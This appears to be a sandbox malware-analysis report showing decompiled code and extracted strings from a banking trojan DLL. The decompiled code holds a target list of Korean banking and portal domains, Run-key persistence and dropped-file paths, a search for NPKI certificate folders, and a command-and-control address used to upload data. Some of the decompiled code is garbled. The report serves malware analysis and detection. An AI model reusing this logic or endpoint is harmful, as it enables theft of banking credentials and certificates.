            • API ID: CloseCreateFormatNamePathShortTimeValue___crtwsprintf
            • String ID: %s "%s",Dispatch$Disp$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==
            • API String ID: 1762869224-3950432356
            • Opcode ID: d0f372c4c36c380af209c7183de226d935087aaaefbf66ce19d7085485c3dcb4
            • Instruction ID: 37d86c3d472a3d605e7482a7a14943cafe3984fcf04a0d8964f0c82a610850ab
            • Opcode Fuzzy Hash: d0f372c4c36c380af209c7183de226d935087aaaefbf66ce19d7085485c3dcb4
            • Instruction Fuzzy Hash: 7D11B2B694421CBEFB11D7A4DC86FEA776CDB14344F1404B1F704BA085DAB16FC88AA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 35%
            			E10005318(void* __ecx, void* __eflags, intOrPtr _a4) {
            				void _v4099;
            				signed char _v4100;
            				signed char* _t20;
            				signed char* _t25;
            				intOrPtr* _t31;
            				signed char* _t32;
            				void* _t33;
            				void* _t35;
            
            				E1000CD20(0x1000, __ecx);
            				_v4100 = _v4100 & 0x00000000;
            				_push("www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.co.ki|www.keb.co.kr.ki|www.kfcc.co.kr.ki|www.lottirich.co.ki|www.nlotto.co.ki|www.gmarket.net|nate.com|www.nate.com|daum.com|www.daum.net|daum.net|www.zum.com|zum.com|naver.com|www.nonghyup.com|www.naver.com||www.nate.net|hanmail.net|www.hanmail.net|www.hanacbs.com|kfcc.co.ki|www.kfcc.co.ki|www.daum.net|daum.net|www.kbstir.com|www.nonghuyp.com|www.wooribank.com|www.ibek.co.ki|www.epostbenk.go.ki|www.hanabenk.com|www.keb.co.ki|www.citibank.co.ki|www.citibank.co.kr.ki|www.standardchartered.co.kr.ki|www.standardchartered.co.ki|www.suhyup-bank.com.ki|www.suhyup-bank.com|www.kjbank.com.ki|www.kjbank.com|openbank.cu.co.kr.ki|openbank.cu.co.ki|www.knbank.co.ki|www.knbank.co.kr.ki|www.busanbank.co.kr.ki|www.busanbank.co.ki|www.suhyup-bank.com|www.suhyup-bank.com.ki|www.standardchartered.co.kr.ki|www.nonghuyp.com.ki|");
            				memset( &_v4099, 0, 0x3ff << 2);
            				asm("stosw");
            				asm("stosb");
            				E1000CD0E(0,  &_v4100);
            				_pop(_t31);
            				0x100411b9();
            				_t25 =  &_v4100;
            				_t20 =  *_t31( &_v4100, 0x7c);
            				_t35 = _t33 + 0x1c;
            				while(1) {
            					_t32 = _t20;
            					if(_t32 == 0) {
            						break;
            					}
            					 *_t32 =  *_t32 & 0x00000000;
            					E1000CD08(0, _a4);
            					E1000CD08(0, _a4);
            					E1000CD08(0, _a4);
            					E1000CD08(0, _a4);
            					_t12 =  &(_t32[1]); // 0x1
            					_t25 = _t12;
            					_t20 =  *_t31(_t25, 0x7c, "\r\n", _t25, "    ", 0x10016ae0);
            					_t35 = _t35 + 0x28;
            				}
            				return _t20;
            			}











            0x10005320
            0x10005325
            0x1000533c
            0x10005341
            0x10005343
            0x10005345
            0x1000534d
            0x10005352
            0x10005353
            0x10005361
            0x10005367
            0x10005369
            0x1000536c
            0x1000536c
            0x10005370
            0x00000000
            0x00000000
            0x10005372
            0x1000537d
            0x1000538a
            0x10005393
            0x100053a0
            0x100053a5
            0x100053a5
            0x100053ab
            0x100053ad
            0x100053ad
            0x100053b6

            APIs
            Strings
            • , xrefs: 10005382
            • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c, xrefs: 1000533C
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID: $www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c
            • API String ID: 2994545307-230412946
            • Opcode ID: 0f0ee0e88a780dbc9f243c599f27c9996d1cd9e2b5f38b67b3bf5a9e7d824a77
            • Instruction ID: c97ba9839e98783193aeac5bdf29b258f442598287bfd32f3df003f3fcbf67da
            • Opcode Fuzzy Hash: 0f0ee0e88a780dbc9f243c599f27c9996d1cd9e2b5f38b67b3bf5a9e7d824a77
            • Instruction Fuzzy Hash: 8501B53690421D76EB12E768CC41FDE7F58EF482C1F104476F648AA096D7B5BAC45A90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 16%
            			E10004351(void* __eax, void* __ecx, void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
            				void _v263;
            				char _v264;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				void* _t21;
            				void* _t23;
            				void* _t27;
            				signed int _t29;
            				void* _t31;
            				char* _t38;
            				void* _t40;
            				void* _t41;
            				signed int _t43;
            				void* _t48;
            				intOrPtr* _t49;
            				CHAR** _t52;
            				void* _t54;
            				intOrPtr* _t55;
            
            				_t60 = __fp0;
            				_t47 = __edx;
            				_t39 = __ecx;
            				_t52 = "cmd.exe";
            				0x10032ab5(__eax, _a8, _t52);
            				_t59 = __eax;
            				if(__eax == 0) {
            					__eflags = _a4 - E100267D4(__eax, __ecx, __edx, _t48, _t52, __eflags, __fp0);
            					if(__eflags != 0) {
            						E10004318(_t19, __ecx, _a4);
            						 *_t55 = 0x7d0;
            						Sleep(??);
            						_t38 = "QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==";
            						_t21 = E10001000(_t39, __eflags, __fp0, _t38);
            						_pop(_t49);
            						0x10041fa9();
            						_pop(_t40);
            						 *_t49(_t21);
            						_t23 = E10001000(_t40, __eflags, __fp0, "QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==");
            						_t41 = 1;
            						 *_t38(E100271E2(_t24, _t38, _t41, _t47), E10001000(_t41, __eflags, __fp0, _t38), _t23);
            						_t27 =  *_t49();
            						Sleep(0x3e8);
            						_t29 = E100290F2(_t27, _t38, _t54, _a8, _a8) & 0x00000085;
            						 *(_t55 + _t29 * 2 - 0x80) =  *(_t55 + _t29 * 2 - 0x80) << 0xa5;
            						asm("cld");
            						asm("invalid");
            						 *_t29 =  *_t29 + 1;
            						__eflags =  *_t29;
            						_t43 = 0x40;
            						__eflags = 0;
            						_t31 = memset( &_v263, 0, _t43 << 2);
            						asm("stosw");
            						asm("stosb");
            						0x10041377();
            						wsprintfA( &_v264, "%s.%d", _a8, _t31);
            						return  *_t38(_a8,  &_v264, 1);
            					}
            					_push("self");
            					L4:
            					_push(0);
            					return L10004139(_t39, _t47, _t59, _t60);
            				}
            				_push(_t52);
            				goto L4;
            			}























            0x10004351
            0x10004351
            0x10004351
            0x1000435c
            0x10004367
            0x1000436c
            0x1000436e
            0x10004379
            0x1000437c
            0x10004394
            0x1000439f
            0x100043a6
            0x100043a8
            0x100043ae
            0x100043b3
            0x100043b4
            0x100043b9
            0x100043bb
            0x100043c4
            0x100043c9
            0x100043d9
            0x100043de
            0x100043e5
            0x100043ef
            0x100043f1
            0x100043f6
            0x100043f7
            0x100043f9
            0x100043f9
            0x100043fd
            0x100043fe
            0x10004406
            0x10004408
            0x1000440a
            0x1000440b
            0x10004421
            0x00000000
            0x10004436
            0x1000437e
            0x10004383
            0x10004383
            0x00000000
            0x1000438b
            0x10004370
            0x00000000

            APIs
            • Sleep.KERNEL32(?,00000000,00000000,?,cmd.exe,100168D4,751443E0,00000000), ref: 100043A6
            • Sleep.KERNEL32(000003E8), ref: 100043E5
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Sleep
            • String ID: QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==$QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==$cmd.exe$self
            • API String ID: 3472027048-2620343502
            • Opcode ID: f80a028ce0456d96c9013e9b422283649f837558aaaf319a9c805c80896dde91
            • Instruction ID: b27527e00d161eb54cfb38a31ab8197fa4e33b6488c85d147b80e3c5571d821e
            • Opcode Fuzzy Hash: f80a028ce0456d96c9013e9b422283649f837558aaaf319a9c805c80896dde91
            • Instruction Fuzzy Hash: CF0126B64043547AFA11B778EC86F8F3B4CDF452E1F110422F94469089CEB9AA808665
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 41%
            			E10004630(void* __edx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
            				char _v8;
            				intOrPtr _v12;
            				char _v16;
            				char _v275;
            				char _v276;
            				void _v535;
            				char _v536;
            				char _v812;
            				signed char _v856;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				char* _t47;
            				void* _t53;
            				intOrPtr _t57;
            				void* _t59;
            				signed int _t66;
            				signed int _t68;
            				void* _t70;
            				void* _t73;
            				void* _t74;
            				void* _t75;
            				void* _t77;
            				void* _t78;
            				void* _t80;
            				void* _t87;
            
            				_t87 = __fp0;
            				_t70 = __edx;
            				_t66 = 0x40;
            				_v536 = 0;
            				memset( &_v535, 0, _t66 << 2);
            				asm("stosw");
            				asm("stosb");
            				E1000CD0E(0,  &_v536);
            				E1000CD08(0,  &_v536);
            				_t80 = _t78 + 0x1c;
            				_t47 =  &_v536;
            				0x10031a18(_t47,  &_v856, "\\*.*", _a4);
            				asm("insd");
            				_v12 = _t47;
            				if(_t47 != 0xffffffff) {
            					_push(_t75);
            					do {
            						_t68 = 0x40;
            						_t73 =  &_v275;
            						_v276 = 0;
            						memset(_t73, 0, _t68 << 2);
            						_t74 = _t73 + _t68;
            						asm("stosw");
            						asm("stosb");
            						wsprintfA( &_v276, "%s\\%s", _a4,  &_v812);
            						_push(_a12);
            						_t53 = E1000CD02(0, _t75);
            						_t80 = _t80 + 0x20;
            						_t75 = _t77 + _t53 - 0x10f;
            						if((_v856 & 0x00000010) == 0) {
            							_v16 = 0;
            							_v8 = 0;
            							_t57 = E10004564(0, _t70, __eflags, _t87,  &_v8,  &_v276,  &_v16);
            							_t80 = _t80 + 0xc;
            							__eflags = _t57;
            							if(__eflags == 0) {
            								goto L9;
            							}
            							__eflags = _v8;
            							if(__eflags == 0) {
            								goto L9;
            							}
            							E1000CBDC(_a8, _t75, _v8, _v16);
            							E1000CCA8(0, 0, _t70, _t74, _t75, _t77, __eflags, _t87, _v8);
            							L8:
            							_t80 = _t80 + 0x14;
            							goto L9;
            						}
            						_t85 = _v812 - 0x2e;
            						if(_v812 == 0x2e) {
            							goto L9;
            						}
            						E1000CBF7(_a8, _t75);
            						E10004630(_t70, _t85, _t87,  &_v276, _a8, _a12);
            						goto L8;
            						L9:
            						_push( &_v856);
            						_push(_v12);
            						_t59 = E100272CF(0, 0, _t70, _t74, _t75, _t77, _t85);
            						asm("clc");
            					} while (_t59 != 0);
            					0x10035c27(_t74, _v12);
            					return _t59;
            				}
            				return _t47;
            			}






























            0x10004630
            0x10004630
            0x1000463f
            0x10004648
            0x1000464e
            0x10004653
            0x10004655
            0x1000465d
            0x1000466e
            0x10004673
            0x1000467d
            0x10004684
            0x10004689
            0x1000468d
            0x10004690
            0x10004696
            0x10004697
            0x1000469b
            0x1000469c
            0x100046a2
            0x100046a8
            0x100046a8
            0x100046aa
            0x100046ac
            0x100046c3
            0x100046c9
            0x100046cc
            0x100046d1
            0x100046d4
            0x100046e2
            0x1000470d
            0x1000471c
            0x1000471f
            0x10004724
            0x10004727
            0x10004729
            0x00000000
            0x00000000
            0x1000472b
            0x1000472e
            0x00000000
            0x00000000
            0x1000473a
            0x10004742
            0x10004747
            0x10004747
            0x00000000
            0x10004747
            0x100046e4
            0x100046eb
            0x00000000
            0x00000000
            0x100046f1
            0x10004703
            0x00000000
            0x1000474a
            0x10004750
            0x10004751
            0x10004754
            0x10004759
            0x1000475a
            0x10004766
            0x00000000
            0x1000476b
            0x1000476f

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
            • API ID: InitializeThunkwsprintf
            • String ID: %s\%s$.$\*.*
            • API String ID: 2324811901-2210278135
            • Opcode ID: d5e4eedee033a2c652017d97775e2094c93dc4010f01f3d435e3a7d7f1b5221c
            • Instruction ID: d326f81f7ac9fe77124f283db77ffe5160f1302aaf38353be2e3603f90d865f5
            • Opcode Fuzzy Hash: d5e4eedee033a2c652017d97775e2094c93dc4010f01f3d435e3a7d7f1b5221c
            • Instruction Fuzzy Hash: F0316FB6C0025CBAEF12DFA4CC45EDE7B7CEB09280F1104A6F618A6051DB319B989B51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 22%
            			E1000800C(void* __eax, char __ebx, void* __ecx, void* __edx, char* __edi, intOrPtr* __esi, void* __fp0) {
            				void* _t60;
            				int _t61;
            				intOrPtr* _t64;
            				intOrPtr* _t73;
            				intOrPtr _t75;
            				void* _t83;
            				void* _t91;
            				void* _t93;
            				intOrPtr _t98;
            				char _t102;
            				signed int _t106;
            				void* _t113;
            				void* _t119;
            				void* _t122;
            				void* _t130;
            				intOrPtr* _t131;
            				void* _t133;
            				void* _t134;
            				void* _t141;
            				char* _t147;
            
            				_t151 = __fp0;
            				_t132 = __esi;
            				_t123 = __edi;
            				_t122 = __edx;
            				_t103 = __ecx;
            				_t102 = __ebx;
            				 *((intOrPtr*)(__eax - 0x18))();
            				asm("cli");
            				_push("\\");
            				_push(_t133 - 0x294);
            				 *__esi();
            				_push(_t133 - 0x4ac);
            				_push(_t133 - 0x294);
            				 *__esi();
            				_t60 = _t133 - 0x4ac;
            				_push(_t60);
            				_push("NPKI");
            				_push(_t60);
            				_t61 = E100254F0(__ebx, __ecx, __edx, __edi, __esi);
            				if(_t61 != 0) {
            					_push(_t133 - 0x294);
            					L10007F4F(__edx);
            					_pop(_t103);
            				} else {
            					_t106 = 0x3f;
            					 *((char*)(_t133 - 0x5d8)) = __ebx;
            					memset(_t133 - 0x5d7, _t61, _t106 << 2);
            					asm("stosw");
            					asm("stosb");
            					_push(0x100165b0);
            					E10003EF4(_t133 - 0x5d8, "%s\\%s", _t133 - 0x294);
            					_push(_t133 - 0x5d8);
            					 *((intOrPtr*)(E10022125(_t133 - 0x5d8, __ebx, 0, _t122, __esi, __fp0) - 0xbfffffff)) =  *((intOrPtr*)(E10022125(_t133 - 0x5d8, __ebx, 0, _t122, __esi, __fp0) - 0xbfffffff)) + E10022125(_t133 - 0x5d8, __ebx, 0, _t122, __esi, __fp0) - 0xbfffffff;
            					_t73 =  *0x8e85700;
            					 *_t73 =  *_t73 + _t73;
            					 *((intOrPtr*)(_t133 - 0x10)) = _t73;
            					_t75 = E10004770(_t133 - 0x294, 0x850fc085, _t122, _t133 - 0x5d7 + _t106, __fp0, _t133 - 0x294, _t73, _t133 - 0x5d7 + _t106);
            					_push(0x1f);
            					 *((intOrPtr*)(_t133 - 0xc)) = _t75;
            					 *((char*)(_t133 - 0x90)) = _t102;
            					memset(_t133 - 0x8f, 0, 0x850fc085 << 2);
            					asm("stosw");
            					asm("stosb");
            					_push(0x1f);
            					 *((char*)(_t133 - 0x190)) = _t102;
            					memset(_t133 - 0x18f, 0, 0 << 2);
            					asm("stosw");
            					asm("stosb");
            					_t113 = 0x1f;
            					_t130 = _t133 - 0x10f;
            					 *((char*)(_t133 - 0x110)) = _t102;
            					memset(_t130, 0, 0 << 2);
            					_t131 = _t130 + _t113;
            					asm("stosw");
            					asm("stosb");
            					 *((intOrPtr*)(_t133 - 8)) = 0x50;
            					_t83 = E10005C4C(_t133 - 0x110, 0x80);
            					_t141 = _t134 + 0x1c - 1 + 0x3c;
            					if(_t83 == 0) {
            						_push( &M1001258F);
            					} else {
            						_push(_t133 - 0x109);
            					}
            					E1000CD0E(0, _t133 - 0x90);
            					0x1003775b();
            					_push(0x2f);
            					_push(_t133 - 0x90);
            					if( *_t131() != 0) {
            						 *((char*)( *_t131(_t133 - 0x90, 0x2f))) = _t102;
            					}
            					_t123 =  *_t131(_t133 - 0x90, 0x3a);
            					_pop(_t119);
            					if(_t123 != _t102) {
            						 *_t123 = _t102;
            						_t98 = E1000CD0E(_t119, _t133 - 0x190);
            						_t123 = _t123 + 1;
            						_t147 = _t123;
            						0x100354a4(_t122, _t123, _t133 - 0x90);
            						_t141 = _t141 + 0xc;
            						 *((intOrPtr*)(_t133 - 8)) = _t98;
            					}
            					_push( *((intOrPtr*)(_t133 - 0xc)));
            					_push( *((intOrPtr*)(_t133 - 0x10)));
            					_push( *((intOrPtr*)(_t133 - 8)));
            					_t91 = E10001000(_t119, _t147, _t151, "L2ltYWdlLnBocA==");
            					_pop(_t103);
            					_push(_t91);
            					_push(_t133 - 0x190);
            					_t93 = E10007E03(_t102, _t103, _t123, _t132, _t147, _t151);
            					_t134 = _t141 + 0x14;
            					_t148 = _t93;
            					if(_t93 != 0) {
            						_push(_t102);
            						_push(_t133 - 0x5d8);
            						E1002E0E4(_t103, _t122, _t123, _t132, _t148);
            						_pop(es);
            					}
            					 *0x10017b90 = 1;
            					Sleep(0xbb8);
            				}
            				_t64 = _t133 - 0x4d8;
            				0x10036154(_t122,  *((intOrPtr*)(_t133 - 4)), _t64);
            				 *((intOrPtr*)(_t133 + 0x15840fc0)) =  *((intOrPtr*)(_t133 + 0x15840fc0)) + _t64;
            				 *((intOrPtr*)(_t64 +  *_t64 - 0x4ab43)) =  *((intOrPtr*)(_t64 +  *_t64 - 0x4ab43)) + _t64 +  *_t64;
            			}























            0x1000800c
            0x1000800c
            0x1000800c
            0x1000800c
            0x1000800c
            0x1000800c
            0x10008010
            0x10008013
            0x1000801e
            0x10008023
            0x10008024
            0x1000802c
            0x10008033
            0x10008034
            0x10008036
            0x1000803c
            0x1000803d
            0x10008042
            0x10008043
            0x1000804c
            0x100081e9
            0x100081ea
            0x100081ef
            0x10008052
            0x1000805a
            0x1000805b
            0x10008061
            0x10008063
            0x10008065
            0x1000806c
            0x1000807e
            0x1000808c
            0x1000809c
            0x1000809e
            0x100080a4
            0x100080a7
            0x100080b2
            0x100080b7
            0x100080b9
            0x100080c5
            0x100080cb
            0x100080cd
            0x100080cf
            0x100080d0
            0x100080db
            0x100080e3
            0x100080e5
            0x100080e7
            0x100080e8
            0x100080eb
            0x100080f1
            0x100080f7
            0x100080f7
            0x100080f9
            0x100080fb
            0x10008108
            0x1000810f
            0x10008114
            0x10008119
            0x10008124
            0x1000811b
            0x10008121
            0x10008121
            0x10008130
            0x10008135
            0x10008143
            0x10008145
            0x1000814c
            0x1000815a
            0x1000815c
            0x10008168
            0x1000816d
            0x1000816e
            0x10008176
            0x10008180
            0x10008185
            0x10008185
            0x10008188
            0x1000818d
            0x10008190
            0x10008190
            0x10008193
            0x10008196
            0x10008199
            0x100081a1
            0x100081a6
            0x100081a7
            0x100081ae
            0x100081af
            0x100081b4
            0x100081b7
            0x100081b9
            0x100081c1
            0x100081c2
            0x100081c3
            0x100081c8
            0x100081c8
            0x100081ce
            0x100081d8
            0x100081d8
            0x10007fc8
            0x10007fd3
            0x10007fd7
            0x10007fdf

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Sleep
            • String ID: %s\%s$107.163.56.232:18963/main.php$L2ltYWdlLnBocA==$NPKI
            • API String ID: 3472027048-2092272908
            • Opcode ID: c010f2aaaa450455edcfe454f18eb8f6808ed7547a3d97b836d84193e7231879
            • Instruction ID: 0f1f9c0d47637e2dd1cb31eff19b899711e0bc4e543d466f80a7974f01d04c09
            • Opcode Fuzzy Hash: c010f2aaaa450455edcfe454f18eb8f6808ed7547a3d97b836d84193e7231879
            • Instruction Fuzzy Hash: 9F51627680425DAEEB51D7B4DC45BEE7BBCFB08251F1404E6E648E6181EB709B888F11
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 64%
            			E1000C3AB(signed int* __ecx, void* __edx, void* __fp0, intOrPtr _a4, signed int _a7, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a19) {
            				signed int _v8;
            				char _v12;
            				char _v13;
            				char _v14;
            				char _v15;
            				char _v16;
            				char _v17;
            				char _v18;
            				char _v19;
            				char _v20;
            				char _v21;
            				char _v22;
            				char _v23;
            				char _v24;
            				signed char _v25;
            				char _v26;
            				char _v27;
            				char _v28;
            				signed int _v32;
            				char _v33;
            				char _v44;
            				char _v56;
            				signed int _v62;
            				signed int _v66;
            				signed char _v74;
            				char _v334;
            				char _v594;
            				signed int _v598;
            				char* _v602;
            				char* _v606;
            				char _v866;
            				intOrPtr _v870;
            				signed int _v874;
            				short _v876;
            				short _v878;
            				signed short _v880;
            				signed int _v884;
            				intOrPtr _v888;
            				intOrPtr _v892;
            				char _v896;
            				signed int _v900;
            				signed int _v904;
            				signed int _v908;
            				unsigned int _v912;
            				signed int _v914;
            				signed int _v916;
            				short _v918;
            				char _v920;
            				char _v1180;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				signed int _t185;
            				signed int _t186;
            				char _t193;
            				signed int _t198;
            				char _t207;
            				char _t209;
            				char _t214;
            				char _t216;
            				char _t218;
            				char _t221;
            				char _t223;
            				signed int _t231;
            				signed int _t233;
            				char _t240;
            				intOrPtr _t245;
            				signed int _t249;
            				intOrPtr _t251;
            				void* _t252;
            				signed int _t256;
            				signed int _t261;
            				signed int _t264;
            				signed int _t265;
            				signed int _t266;
            				signed int _t274;
            				signed int _t285;
            				signed int* _t286;
            				void* _t287;
            				signed int _t288;
            				signed int _t289;
            				void* _t292;
            				void* _t296;
            				void* _t297;
            				void* _t298;
            				void* _t299;
            				void* _t300;
            				void* _t301;
            				void* _t302;
            				void* _t303;
            				void* _t304;
            				signed int _t309;
            				signed int _t311;
            				void* _t323;
            				intOrPtr _t334;
            				signed int _t339;
            				void* _t340;
            				char* _t341;
            				signed int _t342;
            				intOrPtr _t343;
            				signed int* _t346;
            				void* _t347;
            				void* _t348;
            				void* _t349;
            				void* _t350;
            				void* _t354;
            
            				_t354 = __fp0;
            				_t323 = __edx;
            				_t290 = __ecx;
            				_t346 = __ecx;
            				if(__ecx[4] != 0) {
            					return 0x40000;
            				}
            				__eflags = __ecx[9];
            				if(__ecx[9] == 0) {
            					__eflags =  *__ecx;
            					_t334 = _a16;
            					_v32 = 0;
            					if( *__ecx != 0) {
            						__eflags = _t334 - 4;
            						if(_t334 != 4) {
            							_v32 = 0xc;
            						}
            					}
            					_push(_a4);
            					E1000CD0E(_t290,  &_v1180);
            					__eflags = _v1180;
            					_pop(_t292);
            					if(_v1180 == 0) {
            						L89:
            						return 0x10000;
            					}
            					_t185 =  &_v1180;
            					do {
            						__eflags =  *_t185 - 0x5c;
            						if( *_t185 == 0x5c) {
            							 *_t185 = 0x2f;
            						}
            						_t185 = _t185 + 1;
            						__eflags =  *_t185;
            					} while ( *_t185 != 0);
            					__eflags = _t334 - 4;
            					_a19 = _t334 == 4;
            					__eflags = _a19;
            					if(_a19 == 0) {
            						L15:
            						_t16 =  &_a7;
            						 *_t16 = _a7 & 0x00000000;
            						__eflags =  *_t16;
            						L16:
            						__eflags = _a19;
            						_v8 = 8;
            						if(__eflags != 0) {
            							L18:
            							_v8 = 0;
            							L19:
            							__eflags = _t334 - 2;
            							if(_t334 != 2) {
            								__eflags = _t334 - 1;
            								if(_t334 != 1) {
            									__eflags = _t334 - 3;
            									if(_t334 != 3) {
            										__eflags = _t334 - 4;
            										if(__eflags != 0) {
            											goto L89;
            										}
            										_t293 = _t346;
            										_t186 = E1000C0F9(0, _t346, _t323, _t334, __eflags);
            										L27:
            										__eflags = _t186;
            										if(_t186 != 0) {
            											L90:
            											return _t186;
            										}
            										_push(0x10017b9c);
            										_v62 = 0;
            										E1000CD0E(_t293,  &_v866);
            										_push( &_v1180);
            										E1000CD0E(_t293,  &_v594);
            										_push( &_v594);
            										_t193 = E1000CD02(_t293, _t346);
            										_t349 = _t348 + 0x14;
            										__eflags = _a7;
            										_v896 = _t193;
            										if(_a7 != 0) {
            											_push("/");
            											E1000CD08(_t293,  &_v594);
            											_t35 =  &_v896;
            											 *_t35 = _v896 + 1;
            											__eflags =  *_t35;
            											_pop(_t293);
            										}
            										_push(0x10017b9c);
            										E1000CD0E(_t293,  &_v334);
            										__eflags =  *_t346;
            										_v598 = 0;
            										_v884 = 0;
            										_v74 = 1;
            										_v66 = 0;
            										_v878 = 0;
            										_v920 = 0xb17;
            										_v918 = 0x14;
            										_v912 = _t346[0x18];
            										_v908 = 0;
            										_v916 = 8;
            										if( *_t346 != 0) {
            											__eflags = _a19;
            											if(_a19 == 0) {
            												_v916 = 9;
            											}
            										}
            										_v876 = _v916;
            										_t198 = _v8;
            										__eflags = _t198;
            										_v914 = _t198;
            										if(_t198 != 0) {
            											L36:
            											_v904 = 0;
            											goto L37;
            										} else {
            											_t274 = _t346[0x19];
            											__eflags = _t274;
            											if(_t274 < 0) {
            												goto L36;
            											}
            											_v904 = _t274 + _v32;
            											L37:
            											_v900 = _t346[0x19];
            											_v874 = _t346[0x11];
            											_v880 = _v880 & 0x00000000;
            											_v25 = _v25 & 0x00000000;
            											_v870 = _t346[5] + _t346[3];
            											_v606 =  &_v28;
            											_v602 =  &_v56;
            											_v23 = _t346[0x14];
            											_t296 = 8;
            											_v892 = 0x11;
            											_v888 = 9;
            											_v28 = 0x55;
            											_v27 = 0x54;
            											_v26 = 0xd;
            											_v24 = 7;
            											_t207 = E1000CEF0(_t346[0x14], _t296, _t346[0x15]);
            											_v22 = _t207;
            											_t297 = 0x10;
            											_t209 = E1000CEF0(_t346[0x14], _t297, _t346[0x15]);
            											_v21 = _t209;
            											_t298 = 0x18;
            											_v20 = E1000CEF0(_t346[0x14], _t298, _t346[0x15]);
            											_v19 = _t346[0x12];
            											_t299 = 8;
            											_t214 = E1000CEF0(_t346[0x12], _t299, _t346[0x13]);
            											_v18 = _t214;
            											_t300 = 0x10;
